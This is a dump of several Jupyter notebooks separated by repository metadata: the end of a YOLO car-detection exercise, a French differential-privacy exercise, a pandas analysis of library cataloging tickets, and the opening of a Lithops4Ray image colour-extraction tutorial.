\n____________________________________________________________________________________________________\nleaky_re_lu_4 (LeakyReLU) (None, 152, 152, 64) 0 batch_normalization_4[0][0] \n____________________________________________________________________________________________________\nconv2d_5 (Conv2D) (None, 152, 152, 128) 73728 leaky_re_lu_4[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_5 (BatchNorm (None, 152, 152, 128) 512 conv2d_5[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_5 (LeakyReLU) (None, 152, 152, 128) 0 batch_normalization_5[0][0] \n____________________________________________________________________________________________________\nmax_pooling2d_3 (MaxPooling2D) (None, 76, 76, 128) 0 leaky_re_lu_5[0][0] \n____________________________________________________________________________________________________\nconv2d_6 (Conv2D) (None, 76, 76, 256) 294912 max_pooling2d_3[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_6 (BatchNorm (None, 76, 76, 256) 1024 conv2d_6[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_6 (LeakyReLU) (None, 76, 76, 256) 0 batch_normalization_6[0][0] \n____________________________________________________________________________________________________\nconv2d_7 (Conv2D) (None, 76, 76, 128) 32768 leaky_re_lu_6[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_7 (BatchNorm (None, 76, 76, 128) 512 conv2d_7[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_7 (LeakyReLU) (None, 76, 76, 128) 0 batch_normalization_7[0][0] \n____________________________________________________________________________________________________\nconv2d_8 (Conv2D) (None, 76, 76, 256) 294912 leaky_re_lu_7[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_8 (BatchNorm (None, 76, 76, 256) 1024 conv2d_8[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_8 (LeakyReLU) (None, 76, 76, 256) 0 batch_normalization_8[0][0] \n____________________________________________________________________________________________________\nmax_pooling2d_4 (MaxPooling2D) (None, 38, 38, 256) 0 leaky_re_lu_8[0][0] \n____________________________________________________________________________________________________\nconv2d_9 (Conv2D) (None, 38, 38, 512) 1179648 max_pooling2d_4[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_9 (BatchNorm (None, 38, 38, 512) 2048 conv2d_9[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_9 (LeakyReLU) (None, 38, 38, 512) 0 batch_normalization_9[0][0] \n____________________________________________________________________________________________________\nconv2d_10 (Conv2D) (None, 38, 38, 256) 131072 leaky_re_lu_9[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_10 (BatchNor (None, 38, 38, 256) 1024 conv2d_10[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_10 (LeakyReLU) (None, 38, 38, 256) 0 batch_normalization_10[0][0] \n____________________________________________________________________________________________________\nconv2d_11 (Conv2D) (None, 38, 38, 512) 1179648 leaky_re_lu_10[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_11 (BatchNor (None, 38, 38, 512) 2048 conv2d_11[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_11 (LeakyReLU) (None, 38, 38, 512) 0 batch_normalization_11[0][0] \n____________________________________________________________________________________________________\nconv2d_12 (Conv2D) (None, 38, 38, 256) 131072 leaky_re_lu_11[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_12 (BatchNor (None, 38, 38, 256) 1024 conv2d_12[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_12 (LeakyReLU) (None, 38, 38, 256) 0 batch_normalization_12[0][0] \n____________________________________________________________________________________________________\nconv2d_13 (Conv2D) (None, 38, 38, 512) 1179648 leaky_re_lu_12[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_13 (BatchNor (None, 38, 38, 512) 2048 conv2d_13[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_13 (LeakyReLU) (None, 38, 38, 512) 0 batch_normalization_13[0][0] \n____________________________________________________________________________________________________\nmax_pooling2d_5 (MaxPooling2D) (None, 19, 19, 512) 0 leaky_re_lu_13[0][0] \n____________________________________________________________________________________________________\nconv2d_14 (Conv2D) (None, 19, 19, 1024) 4718592 max_pooling2d_5[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_14 (BatchNor (None, 19, 19, 1024) 4096 conv2d_14[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_14 (LeakyReLU) (None, 19, 19, 1024) 0 batch_normalization_14[0][0] \n____________________________________________________________________________________________________\nconv2d_15 (Conv2D) (None, 19, 19, 512) 524288 leaky_re_lu_14[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_15 (BatchNor (None, 19, 19, 512) 2048 conv2d_15[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_15 (LeakyReLU) (None, 19, 19, 512) 0 batch_normalization_15[0][0] \n____________________________________________________________________________________________________\nconv2d_16 (Conv2D) (None, 19, 19, 1024) 4718592 leaky_re_lu_15[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_16 (BatchNor (None, 19, 19, 1024) 4096 conv2d_16[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_16 (LeakyReLU) (None, 19, 19, 1024) 0 batch_normalization_16[0][0] \n____________________________________________________________________________________________________\nconv2d_17 (Conv2D) (None, 19, 19, 512) 524288 leaky_re_lu_16[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_17 (BatchNor (None, 19, 19, 512) 2048 conv2d_17[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_17 (LeakyReLU) (None, 19, 19, 512) 0 batch_normalization_17[0][0] \n____________________________________________________________________________________________________\nconv2d_18 (Conv2D) (None, 19, 19, 1024) 4718592 leaky_re_lu_17[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_18 (BatchNor (None, 19, 19, 1024) 4096 conv2d_18[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_18 (LeakyReLU) (None, 19, 19, 1024) 0 batch_normalization_18[0][0] \n____________________________________________________________________________________________________\nconv2d_19 (Conv2D) (None, 19, 19, 1024) 9437184 leaky_re_lu_18[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_19 (BatchNor (None, 19, 19, 1024) 4096 conv2d_19[0][0] \n____________________________________________________________________________________________________\nconv2d_21 (Conv2D) (None, 38, 38, 64) 32768 leaky_re_lu_13[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_19 (LeakyReLU) (None, 19, 19, 1024) 0 batch_normalization_19[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_21 (BatchNor (None, 38, 38, 64) 256 conv2d_21[0][0] \n____________________________________________________________________________________________________\nconv2d_20 (Conv2D) (None, 19, 19, 1024) 9437184 leaky_re_lu_19[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_21 (LeakyReLU) (None, 38, 38, 64) 0 batch_normalization_21[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_20 (BatchNor (None, 19, 19, 1024) 4096 conv2d_20[0][0] \n____________________________________________________________________________________________________\nspace_to_depth_x2 (Lambda) (None, 19, 19, 256) 0 leaky_re_lu_21[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_20 (LeakyReLU) (None, 19, 19, 1024) 0 batch_normalization_20[0][0] \n____________________________________________________________________________________________________\nconcatenate_1 (Concatenate) (None, 19, 19, 1280) 0 space_to_depth_x2[0][0] \n leaky_re_lu_20[0][0] \n____________________________________________________________________________________________________\nconv2d_22 (Conv2D) (None, 19, 19, 1024) 11796480 concatenate_1[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_22 (BatchNor (None, 19, 19, 1024) 4096 conv2d_22[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_22 (LeakyReLU) (None, 19, 19, 1024) 0 batch_normalization_22[0][0] \n____________________________________________________________________________________________________\nconv2d_23 (Conv2D) (None, 19, 19, 425) 435625 leaky_re_lu_22[0][0] \n====================================================================================================\nTotal params: 50,983,561\nTrainable params: 50,962,889\nNon-trainable params: 20,672\n____________________________________________________________________________________________________\n"
]
],
[
[
"**Note**: On some computers, you may see a warning message from Keras. Don't worry about it if you do--it is fine.\n\n**Reminder**: this model converts a preprocessed batch of input images (shape: (m, 608, 608, 3)) into a tensor of shape (m, 19, 19, 5, 85) as explained in Figure (2).",
"_____no_output_____"
],
[
"### 3.3 - Convert output of the model to usable bounding box tensors\n\nThe output of `yolo_model` is a (m, 19, 19, 5, 85) tensor that needs to pass through non-trivial processing and conversion. The following cell does that for you.\n\nIf you are curious about how `yolo_head` is implemented, you can find the function definition in the file ['keras_yolo.py'](https://github.com/allanzelener/YAD2K/blob/master/yad2k/models/keras_yolo.py). The file is located in your workspace in this path 'yad2k/models/keras_yolo.py'.",
"_____no_output_____"
]
],
[
[
"yolo_outputs = yolo_head(yolo_model.output, anchors, len(class_names))",
"_____no_output_____"
]
],
[
[
"You added `yolo_outputs` to your graph. This set of 4 tensors is ready to be used as input by your `yolo_eval` function.",
"_____no_output_____"
],
[
"### 3.4 - Filtering boxes\n\n`yolo_outputs` gave you all the predicted boxes of `yolo_model` in the correct format. You're now ready to perform filtering and select only the best boxes. Let's now call `yolo_eval`, which you had previously implemented, to do this. ",
"_____no_output_____"
]
],
[
[
"scores, boxes, classes = yolo_eval(yolo_outputs, image_shape)",
"_____no_output_____"
]
],
[
[
"### 3.5 - Run the graph on an image\n\nLet the fun begin. You have created a graph that can be summarized as follows:\n\n1. <font color='purple'> yolo_model.input </font> is given to `yolo_model`. The model is used to compute the output <font color='purple'> yolo_model.output </font>\n2. <font color='purple'> yolo_model.output </font> is processed by `yolo_head`. It gives you <font color='purple'> yolo_outputs </font>\n3. <font color='purple'> yolo_outputs </font> goes through a filtering function, `yolo_eval`. It outputs your predictions: <font color='purple'> scores, boxes, classes </font>\n\n**Exercise**: Implement predict() which runs the graph to test YOLO on an image.\nYou will need to run a TensorFlow session, to have it compute `scores, boxes, classes`.\n\nThe code below also uses the following function:\n```python\nimage, image_data = preprocess_image(\"images/\" + image_file, model_image_size = (608, 608))\n```\nwhich outputs:\n- image: a python (PIL) representation of your image used for drawing boxes. You won't need to use it.\n- image_data: a numpy-array representing the image. This will be the input to the CNN.\n\n**Important note**: when a model uses BatchNorm (as is the case in YOLO), you will need to pass an additional placeholder in the feed_dict {K.learning_phase(): 0}.\n\n#### Hint: Using the TensorFlow Session object\n* Recall that above, we called `K.get_Session()` and saved the Session object in `sess`.\n* To evaluate a list of tensors, we call `sess.run()` like this:\n```\nsess.run(fetches=[tensor1,tensor2,tensor3],\n feed_dict={yolo_model.input: the_input_variable,\n K.learning_phase():0\n }\n```\n* Notice that the variables `scores, boxes, classes` are not passed into the `predict` function, but these are global variables that you will use within the `predict` function.",
"_____no_output_____"
]
],
[
[
"def predict(sess, image_file):\n \"\"\"\n Runs the graph stored in \"sess\" to predict boxes for \"image_file\". Prints and plots the predictions.\n \n Arguments:\n sess -- your tensorflow/Keras session containing the YOLO graph\n image_file -- name of an image stored in the \"images\" folder.\n \n Returns:\n out_scores -- tensor of shape (None, ), scores of the predicted boxes\n out_boxes -- tensor of shape (None, 4), coordinates of the predicted boxes\n out_classes -- tensor of shape (None, ), class index of the predicted boxes\n \n Note: \"None\" actually represents the number of predicted boxes, it varies between 0 and max_boxes. \n \"\"\"\n\n # Preprocess your image\n image, image_data = preprocess_image(\"images/\" + image_file, model_image_size = (608, 608))\n\n # Run the session with the correct tensors and choose the correct placeholders in the feed_dict.\n # You'll need to use feed_dict={yolo_model.input: ... , K.learning_phase(): 0})\n ### START CODE HERE ### (≈ 1 line)\n out_scores, out_boxes, out_classes = sess.run([scores, boxes, classes], feed_dict={yolo_model.input: image_data,\n K.learning_phase(): 0})\n ### END CODE HERE ###\n\n # Print predictions info\n print('Found {} boxes for {}'.format(len(out_boxes), image_file))\n # Generate colors for drawing bounding boxes.\n colors = generate_colors(class_names)\n # Draw bounding boxes on the image file\n draw_boxes(image, out_scores, out_boxes, out_classes, class_names, colors)\n # Save the predicted bounding box on the image\n image.save(os.path.join(\"out\", image_file), quality=90)\n # Display the results in the notebook\n output_image = scipy.misc.imread(os.path.join(\"out\", image_file))\n imshow(output_image)\n \n return out_scores, out_boxes, out_classes",
"_____no_output_____"
]
],
[
[
"Run the following cell on the \"test.jpg\" image to verify that your function is correct.",
"_____no_output_____"
]
],
[
[
"out_scores, out_boxes, out_classes = predict(sess, \"test.jpg\")",
"Found 7 boxes for test.jpg\ncar 0.60 (925, 285) (1045, 374)\ncar 0.66 (706, 279) (786, 350)\nbus 0.67 (5, 266) (220, 407)\ncar 0.70 (947, 324) (1280, 705)\ncar 0.74 (159, 303) (346, 440)\ncar 0.80 (761, 282) (942, 412)\ncar 0.89 (367, 300) (745, 648)\n"
]
],
[
[
"**Expected Output**:\n\n<table>\n <tr>\n <td>\n **Found 7 boxes for test.jpg**\n </td>\n </tr>\n <tr>\n <td>\n **car**\n </td>\n <td>\n 0.60 (925, 285) (1045, 374)\n </td>\n </tr>\n <tr>\n <td>\n **car**\n </td>\n <td>\n 0.66 (706, 279) (786, 350)\n </td>\n </tr>\n <tr>\n <td>\n **bus**\n </td>\n <td>\n 0.67 (5, 266) (220, 407)\n </td>\n </tr>\n <tr>\n <td>\n **car**\n </td>\n <td>\n 0.70 (947, 324) (1280, 705)\n </td>\n </tr>\n <tr>\n <td>\n **car**\n </td>\n <td>\n 0.74 (159, 303) (346, 440)\n </td>\n </tr>\n <tr>\n <td>\n **car**\n </td>\n <td>\n 0.80 (761, 282) (942, 412)\n </td>\n </tr>\n <tr>\n <td>\n **car**\n </td>\n <td>\n 0.89 (367, 300) (745, 648)\n </td>\n </tr>\n</table>",
"_____no_output_____"
],
[
"The model you've just run is actually able to detect 80 different classes listed in \"coco_classes.txt\". To test the model on your own images:\n 1. Click on \"File\" in the upper bar of this notebook, then click \"Open\" to go on your Coursera Hub.\n 2. Add your image to this Jupyter Notebook's directory, in the \"images\" folder\n 3. Write your image's name in the cell above code\n 4. Run the code and see the output of the algorithm!\n\nIf you were to run your session in a for loop over all your images. Here's what you would get:\n\n<center>\n<video width=\"400\" height=\"200\" src=\"nb_images/pred_video_compressed2.mp4\" type=\"video/mp4\" controls>\n</video>\n</center>\n\n<caption><center> Predictions of the YOLO model on pictures taken from a camera while driving around the Silicon Valley <br> Thanks [drive.ai](https://www.drive.ai/) for providing this dataset! </center></caption>",
"_____no_output_____"
],
[
"\n## <font color='darkblue'>What you should remember:\n \n- YOLO is a state-of-the-art object detection model that is fast and accurate\n- It runs an input image through a CNN which outputs a 19x19x5x85 dimensional volume. \n- The encoding can be seen as a grid where each of the 19x19 cells contains information about 5 boxes.\n- You filter through all the boxes using non-max suppression. Specifically: \n - Score thresholding on the probability of detecting a class to keep only accurate (high probability) boxes\n - Intersection over Union (IoU) thresholding to eliminate overlapping boxes\n- Because training a YOLO model from randomly initialized weights is non-trivial and requires a large dataset as well as lot of computation, we used previously trained model parameters in this exercise. If you wish, you can also try fine-tuning the YOLO model with your own dataset, though this would be a fairly non-trivial exercise. ",
"_____no_output_____"
],
[
"**References**: The ideas presented in this notebook came primarily from the two YOLO papers. The implementation here also took significant inspiration and used many components from Allan Zelener's GitHub repository. The pre-trained weights used in this exercise came from the official YOLO website. \n- Joseph Redmon, Santosh Divvala, Ross Girshick, Ali Farhadi - [You Only Look Once: Unified, Real-Time Object Detection](https://arxiv.org/abs/1506.02640) (2015)\n- Joseph Redmon, Ali Farhadi - [YOLO9000: Better, Faster, Stronger](https://arxiv.org/abs/1612.08242) (2016)\n- Allan Zelener - [YAD2K: Yet Another Darknet 2 Keras](https://github.com/allanzelener/YAD2K)\n- The official YOLO website (https://pjreddie.com/darknet/yolo/) ",
"_____no_output_____"
],
[
"**Car detection dataset**:\n<a rel=\"license\" href=\"http://creativecommons.org/licenses/by/4.0/\"><img alt=\"Creative Commons License\" style=\"border-width:0\" src=\"https://i.creativecommons.org/l/by/4.0/88x31.png\" /></a><br /><span xmlns:dct=\"http://purl.org/dc/terms/\" property=\"dct:title\">The Drive.ai Sample Dataset</span> (provided by drive.ai) is licensed under a <a rel=\"license\" href=\"http://creativecommons.org/licenses/by/4.0/\">Creative Commons Attribution 4.0 International License</a>. We are grateful to Brody Huval, Chih Hu and Rahul Patel for providing this data. ",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
cb51c2a9f6c77f230233803970161a322c86c817 | 7,383 | ipynb | Jupyter Notebook | Jour-2/Serie-1/jour_2_serie_1_exo_2.ipynb | c4dt/cours_gyminf_sec_2104 | 378e76951081da68eb792c9b035486227d3d260f | [
"CC0-1.0"
] | null | null | null | Jour-2/Serie-1/jour_2_serie_1_exo_2.ipynb | c4dt/cours_gyminf_sec_2104 | 378e76951081da68eb792c9b035486227d3d260f | [
"CC0-1.0"
] | null | null | null | Jour-2/Serie-1/jour_2_serie_1_exo_2.ipynb | c4dt/cours_gyminf_sec_2104 | 378e76951081da68eb792c9b035486227d3d260f | [
"CC0-1.0"
] | null | null | null | 31.823276 | 214 | 0.599621 | [
[
[
"# Exercice 2\n\nCe deuxième exercice va se produire dans une partie `code` où vous devez écrire quelques lignes de Python! Mais pas de soucis, on va y aller progressivement.\nEn-dessous de ce block de texte vous trouverez trois blocks pour les trois niveaux de l'exercice.\n\nOn va se pencher sur la *Differential Privacy* et faire quelques exercices dessus.\n\n## 1. Connaissance\n\nDans la première partie vous trouvez une petite fonction qui prend comme entrée si vous êtes un délinquant, et qui sort une réponse protégée par la *Differential Privacy*.\nsi vous faites tourner le code, il vous donnera quelques réponses pour des entrées différentes.\n\nVous pouvez faire tourner le block plusieurs fois, et il devrait vous afficher des résultats différents presque chaque fois.",
"_____no_output_____"
]
],
[
[
"# Exercice 2 - Partie 1\nimport random\n\n# Returns True or False for a coin toss. The random.choice method chooses randombly between\n# the two values. Think of \"True\" as \"Tail\", and \"False\" as \"Head\"\ndef coin() -> bool:\n return random.choice([True, False])\n\n# Differential Privacy 1 - takes a vairable as input that indicates if the real value is guilty or\n# not. Then it uses DP to decide whether it should output the real value, or a made-up guiltyness.\ndef dp_1(guilty: bool) -> bool:\n if coin():\n return guilty\n else:\n return coin()\n\n# A pretty-printing method that shows nicely what is going on.\ndef print_guilty(guilty: bool) -> str:\n if guilty:\n print(\"Is guilty\")\n else:\n print(\"Is innocent\")\n \n# Two outputs for a guilty and an innocent person:\nprint_guilty(dp_1(True))\nprint_guilty(dp_1(False))",
"_____no_output_____"
]
],
[
[
"## 2. Compréhension\n\n### Générateurs aléatoire\n\nPourquoi en lançant le block plusieurs fois vous recevez des résultats différents *presque* chaque fois?\n\n### Espérance mathématique\n\nOn va essayer de trouver l'espérance mathématique de notre function dépendant si on est innocent ou pas. Au lieu de le faire mathémeatiquement, on va le faire par essai et contage, et un peu de bon sens...\n\nDans le block `Exercice 2 - Partie 2`, ajoutez 10 fois la ligne suivante:\n\n print_guilty(dp_1(True))\n\npuis lancez le block.\n\n- Combien de fois vous trouvez `guilty`, combien de fois `innocent`?\n\n- Quelle est donc l'espérance mathématique si on met `guilty` à `1`, et `innocent` à `0`?\n\n- La même question, mais si on met `print_guilty(dp_1(False))`\n\n### Correction de la DP\n\n- Supposons qu'on a seulement une personne qui est coupable - combien de coupables va-t-on trouver en moyenne?\n\n- En connaissant l'espérence mathématique de `dp_1(False)`, comment on peut calculer la valeur probable de personnes coupables?",
"_____no_output_____"
]
],
[
[
"# Exercice 2 - Partie 2",
"_____no_output_____"
]
],
[
[
"## 3. Application\n\nSi vous connaissez un peu la programmation, alors on peut faire les calculs un peu plus correcte.\n\n### Créer un nombre élevé de mesures\n\nLa première méthode `create_measures` va remplacer notre utilisation ligne par ligne d'appel à `dp_1`.\nLe paramètre `p_guilty` indique la probabilité entre 0 et 1 qu'un élément est coupable.\n\n### Calculer le nombre de personnes coupables\n\nLa deuxième méthode `calculate_guilty` prend la sortie de `create_measures` pour calculer le nombre\nprobable de personnes coupables.\nIl faudra d'abord compter le nombre de `True` dans l'entré, puis le mettre en relation avec le nombre\ntotal de réponses.\nAprès il faut corriger par rapport à l'érreur introduite par la DP.",
"_____no_output_____"
]
],
[
[
"# Exercice 2 - Partie 3\n\n# This method returns a number of throws where each throw is randomly chosen to be\n# from a guilty person with probability p_guilty.\n# The return value should be an array of booleans.\ndef create_measures(throws: int, p_guilty: float) -> [bool]:\n pass\n\n# Returns the most probable number of guilty persons given the array of results.\ndef calculate_guilty(results: [bool]) -> float:\n pass\n\n# This should print a number close to 0.1 * 100 = 10 guilty persons.\nprint(f'The number of guilty persons are: {calculate_guilty(create_measures(100, 0.1))}')",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb51c4e1701ce3363f1bb8da0fabbf5fdc05a3a9 | 13,119 | ipynb | Jupyter Notebook | notebooks/action_plan_data.ipynb | BookOps-CAT/tickets-analysis | 7fca7367e8e789fac0950b1e5a4a272e749f0512 | [
"MIT"
] | null | null | null | notebooks/action_plan_data.ipynb | BookOps-CAT/tickets-analysis | 7fca7367e8e789fac0950b1e5a4a272e749f0512 | [
"MIT"
] | null | null | null | notebooks/action_plan_data.ipynb | BookOps-CAT/tickets-analysis | 7fca7367e8e789fac0950b1e5a4a272e749f0512 | [
"MIT"
] | null | null | null | 25.132184 | 153 | 0.475112 | [
[
[
"import pandas as pd\nfh = '../files/tickets-gen-all.csv'\ndf = pd.read_csv(fh, index_col=0, parse_dates=['created', 'opened_at', 'updated_on', 'resolved'])\ndf.shape",
"_____no_output_____"
],
[
"df.columns",
"_____no_output_____"
]
],
[
[
"##### cataloging active tickets only",
"_____no_output_____"
]
],
[
[
"cadf = df[((df['category'] == 'Cataloging') | (df['assignment_group'] == 'BKOPS CAT')) & ((df['state'] != 'Closed') & (df['state'] != 'Resolved'))]",
"_____no_output_____"
]
],
[
[
"## Cataloging tickets requiring category change (diff dept)",
"_____no_output_____"
]
],
[
[
"df['category'].unique()",
"_____no_output_____"
],
[
"df['assignment_group'].unique()",
"_____no_output_____"
],
[
"cat_change_df = df[(df['category'] == 'Cataloging') & ((df['assignment_group'] != 'BKOPS CAT') & (df['assignment_group'].notnull()))]",
"_____no_output_____"
],
[
"cat_change_df.shape[0]",
"_____no_output_____"
],
[
"cat_change_df_active = cat_change_df[(cat_change_df['state'] != 'Closed') & (cat_change_df['state'] != 'Resolved')]",
"_____no_output_____"
],
[
"print(f'# of tickets: {cat_change_df_active.shape[0]}')",
"# of tickets: 34\n"
]
],
[
[
"## Awaiting User & Vendor tickets",
"_____no_output_____"
]
],
[
[
"awaiting_df = cadf[((cadf['state'] == 'Awaiting Vendor') | (cadf['state'] == 'Awaiting User Info')) & (cadf['created'] < '2020-01-01')]",
"_____no_output_____"
],
[
"awaiting_df['state'].unique()",
"_____no_output_____"
],
[
"print(f'# of tickets: {awaiting_df.shape[0]}')",
"# of tickets: 748\n"
]
],
[
[
"### NEW tickets backlog (older than mid February 2020)",
"_____no_output_____"
]
],
[
[
"new_backlog_df = cadf[(cadf['state'] == 'New') & (cadf['assigned_to'].isnull())]",
"_____no_output_____"
],
[
"new_backlog_df.shape[0]",
"_____no_output_____"
],
[
"for lib, ldf in new_backlog_df.groupby('system'):\n print(lib, f'# of tickets: {ldf.shape[0]}')",
"BPL Circulating # of tickets: 193\nNYPL Circulating # of tickets: 147\nNYPL Research # of tickets: 44\n"
]
],
[
[
"## Active CAT tickets",
"_____no_output_____"
]
],
[
[
"years = [2013, 2014, 2015, 2016, 2017, 2018, 2019, 2020]\n\ncaadf = cadf[cadf['state'] == 'Active']\n\nfor lib, ldf in caadf.groupby('system'):\n staff_df = pd.DataFrame(columns=['staff', 'year', 'tickets'])\n for staff, sdf in ldf.groupby('assigned_to'):\n d = dict()\n for y, ydf in sdf.groupby(sdf['created'].map(lambda x: x.year)):\n d[y]={'staff': staff, 'year': y, 'tickets': ydf.shape[0]}\n for y in years:\n if y in d.keys():\n staff_df = staff_df.append(d[y], ignore_index=True)\n else:\n staff_df = staff_df.append({'staff': staff, 'year': y, 'tickets': 0}, ignore_index=True)\n \n staff_df.to_csv(f'../data-display/{lib}-active-tickets-by-staff.csv', index=False)\n ",
"_____no_output_____"
]
],
[
[
"#### active by library per year",
"_____no_output_____"
]
],
[
[
"lib_out_df = pd.DataFrame(columns=['library', 'year', 'tickets'])\nfor lib, ldf in caadf.groupby('system'):\n d = dict()\n for y, ydf in ldf.groupby(ldf['created'].map(lambda x: x.year)):\n d[y]={'library': lib, 'year': y, 'tickets': ydf.shape[0]}\n for y in years:\n if y in d.keys():\n lib_out_df = lib_out_df.append(d[y], ignore_index=True)\n else:\n lib_out_df = lib_out_df.append({'library': lib, 'year': y, 'tickets': 0}, ignore_index=True)\nlib_out_df.to_csv('../data-display/cat-active-tickets-per-lib-timeline.csv', index=False)",
"_____no_output_____"
]
],
[
[
"#### Active categories",
"_____no_output_____"
]
],
[
[
"cat_out_df = pd.DataFrame(columns=['subcategory', 'tickets'])\nfor cat, cdf in caadf.groupby('subcategory'):\n print(cat, cdf.shape[0])\n cat_out_df = cat_out_df.append(\n dict(\n subcategory=cat,\n tickets=cdf.shape[0]\n ),\n ignore_index=True\n )\ncat_out_df.head()",
"Barcode sticker request (Research centers only) 2\nBarcodes for circulating materials 5\nCall number error 362\nCall number missing 25\nCataloging Request for a Free Internet Resource 18\nCataloging error 202\nCollection HQ 10\nDamaged material / missing pieces 3\nDuplicate records 1\nElectronic resource 128\nHolds fulfillment--NYPL only 7\nItem attached to wrong bib record 56\nItem not linked 83\nItem record problem 41\nLeased items 2\nLocation code error 11\nOCLC Holdings 6\nOnline Catalog 47\nOther 215\nSpine labels 69\nStatus of request 1\nVolume record needed 4\n"
],
[
"cat_out_df.to_csv('../data-display/cat-active-by-category.csv', index=False)",
"_____no_output_____"
],
[
"\nfor lib, ldf in caadf.groupby('system'):\n lib_out_df = pd.DataFrame(columns=['category', 'tickets'])\n for cat, cdf in ldf.groupby('subcategory'):\n lib_out_df = lib_out_df.append(\n dict(\n category=cat,\n tickets=cdf.shape[0]\n ),\n ignore_index=True)\n \n lib_out_df.to_csv(f'../data-display/{lib}-active-tickets-by-category.csv', index=False)",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb51d73d26632ef22b04e2ea72169ac04ca94336 | 4,797 | ipynb | Jupyter Notebook | examples/lithops4ray-color-extraction.ipynb | project-codeflare/data-integration | 9d0b89718d0c4234e52a0d7b384fdb790a64e0ce | [
"Apache-2.0"
] | 4 | 2021-07-12T03:42:17.000Z | 2021-11-25T19:43:01.000Z | examples/lithops4ray-color-extraction.ipynb | project-codeflare/data-integration | 9d0b89718d0c4234e52a0d7b384fdb790a64e0ce | [
"Apache-2.0"
] | null | null | null | examples/lithops4ray-color-extraction.ipynb | project-codeflare/data-integration | 9d0b89718d0c4234e52a0d7b384fdb790a64e0ce | [
"Apache-2.0"
] | null | null | null | 39.319672 | 791 | 0.647488 | [
[
[
"# Color extraction from images with Lithops4Ray\n\nIn this tutorial we explain how to use Lithops4Ray to extract colors and [HSV](https://en.wikipedia.org/wiki/HSL_and_HSV) color range from the images persisted in the IBM Cloud Oject Storage. To experiment with this tutorial, you can use any public image dataset and upload it to your bucket in IBM Cloud Object Storage. For example follow [Stanford Dogs Dataset](http://vision.stanford.edu/aditya86/ImageNetDogs/) to download images. We also provide upload [script](https://github.com/project-codeflare/data-integration/blob/main/scripts/upload_to_ibm_cos.py) that can be used to upload local images to the IBM Cloud Object Storage \n\nOur code is using colorthief package that need to be installed in the Ray cluster, both on head and worker nodes. You can edit `cluster.yaml` file and add\n \n `- pip install colorthief`\n\nTo the `setup_commands` section. This will ensure that once Ray cluster is started required package will be installed automatically.",
"_____no_output_____"
]
],
[
[
"import lithops\nimport ray",
"_____no_output_____"
]
],
[
[
"We write function that extracts color from a single image. Once invoked, Lithops framework will inject a reserved parameter `obj` that points to the data stream of the image. More information on the reserved `obj` parameter can be found [here](https://github.com/lithops-cloud/lithops/blob/master/docs/data_processing.md#processing-data-from-a-cloud-object-storage-service)",
"_____no_output_____"
]
],
[
[
"def extract_color(obj):\n from colorthief import ColorThief\n body = obj.data_stream\n dominant_color = ColorThief(body).get_color(quality=10)\n return dominant_color, obj.key\n",
"_____no_output_____"
]
],
[
[
